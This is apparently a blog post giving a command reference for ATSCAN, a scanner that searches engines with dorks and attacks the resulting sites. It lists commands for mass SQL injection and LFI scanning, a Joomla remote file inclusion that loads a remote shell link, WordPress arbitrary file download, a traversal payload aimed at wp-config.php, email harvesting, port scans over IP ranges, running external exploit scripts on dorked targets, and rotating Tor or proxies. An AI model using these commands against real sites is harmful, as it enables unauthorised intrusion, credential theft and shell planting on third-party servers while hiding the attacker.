● PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt
● RANDOM:
Random proxy --proxy-random [proxy list.txt]
Random browser --b-random
Random engine --m-random
● SET
HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header
"Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post
--header "Authorization:Basic YWRtaW46YWRtaW4
[OTHER]keep_alive:1"
● SEARCH
ENGINE:
Search: atscan --dork [dork> --level [level]
Search: atscan -d [dork> -l [level]
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google:
2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3>
--level [level]
Search and rand: atscan -d [dork] -l [level] --exp
"/index.php?id=rang(1-9)" --sql
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value]
--sites
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value]
--sites
Get Server wordpress sites: atscan -t [ip] --level [value] --wp
Get Server joomla sites: atscan -t [ip] --level value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level value] --zip
WP Arbitry File Download: atscan -t [ip] --level [[[value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell
link]
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level]
--email
Search + get ips: atscan --dork [dork] --level [level] --ip
● REGULAR
EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex
[regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){
3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails:
'((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
● REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql
atscan -t [target] --exp
"/index.php?id=repeat(../-9)wp-config.php"
● PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command
"your extern command"
● ENCODE
/ DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]
● DATA:
Post data: atscan -t [target] --data "field1:value1
[DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile
[DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post
/ --get]
Post + Validation: --data "name:userfile
[DATAFILE]value:file.txt" -v [string] / --status [code] [--post /
--get]
● EXTERNAL
COMMANDES:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v
--TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v
--HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV
-p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2
--command "php WP-dl-skin.php-exploit.php --TARGET"
● MULTIPLE
SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string]
--exp [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]
● USER
PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload |
payloads.txt]
● SEARCH
VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid
[string]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid
[string]
atscan -d [dork / dorks.txt] -l [level] --unique
● SCAN
VALIDATION:
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] /
--valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string]
--status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status
[code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string]
--status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full
--status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp
[payload] --status [code] / --valid [string]
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string]
/ --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status
[code] / --valid [string]
● UPDATE
TOOL:
atscan --update
● UNINSTALL
TOOL:
atscan --uninstall
|
No comments:
Post a Comment